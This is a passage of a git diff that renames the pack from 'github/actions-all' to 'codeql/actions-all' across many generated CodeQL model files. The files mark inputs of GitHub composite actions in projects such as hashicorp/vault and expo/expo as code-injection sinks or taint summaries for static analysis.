pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 649fac9fede..caf896bbac3 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 3623fe51e84..02917d6da30 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index d730cdb6a99..17bea3155c5 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index bcec913ef7c..64ff68f38ad 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index ad5ec2e544f..c6bdede140f 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 9c5c38007bc..7909d617776 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 8899c0563e8..c62ee58c440 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index f71c818a337..37efd3a4d40 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 989eca71960..0a84e79d024 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 2666233ac87..a026f052934 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index e8aa6be8fa6..9b199fb5973 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 9bd16741353..13ae8d0f718 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 3c50e297eb5..04775e83571 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index d1c181a8707..b0b5918d13f 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 5b600a4cad4..9879b7e4451 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 65fdcb11a00..e38a5edef48 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index 08c3ff9cf43..4fa53f367e4 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index c06978549fb..f3fa2937545 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index eaca3fb9c62..c66fab9d129 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index e1c608d3e10..f7e76b69113 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index dc1f7a7b3b8..a216abf29ac 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index a80ce46abc5..396841a6c16 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 15886c2c945..1a3f383d23b 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 45769a727d8..98755665d86 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 9f85415a482..5849fe5c34f 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bbfb20551af..fdc8478bef7 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index f8dc63ee029..72b9c1c870e 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index 5ad65dcc0bd..b8688ab86d2 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 90b6b38b6b0..e2aacd8f10b 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 4f1157d862a..13f28980e57 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index b8ded477dd2..ee1ef52ecd1 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 87ae2f5d614..14e60d9cc19 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 0cfd7be68a3..0516493f6ba 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 54a05620d90..62e64b63b44 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index e16f3fc74b3..e132ef1cee3 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index a3f692e7d2f..90d50a1b757 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 5acd7348464..a8b9c41363e 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 365dd90b120..75652ed69f9 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index 0d7a06175a5..973007c5490 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 4c831ca673a..35a1a09df59 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 40b5f413d66..6b193462780 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 565bd119df7..448f657d97e 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 31157d853d0..009f4f1ef08 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 6208b63b89a..bcb88287215 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 1073ddd49c1..8476c40ceaf 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 2b71886a286..462489a4c51 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 547bcca2ec9..56b354c870e 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index e8ed66af89a..9fbb4108868 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index af1327f7d7f..5fc85d3530e 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 887743c2c70..b0b36e7bd36 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index ff7e51e477a..cb2c50f440c 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 55d0ddfba22..7ac5c21a613 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d4c0823c2ec..1276334381d 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 7d789ec3ccc..0fc27163dd0 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 2aa6633d752..ae994dbad1a 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - 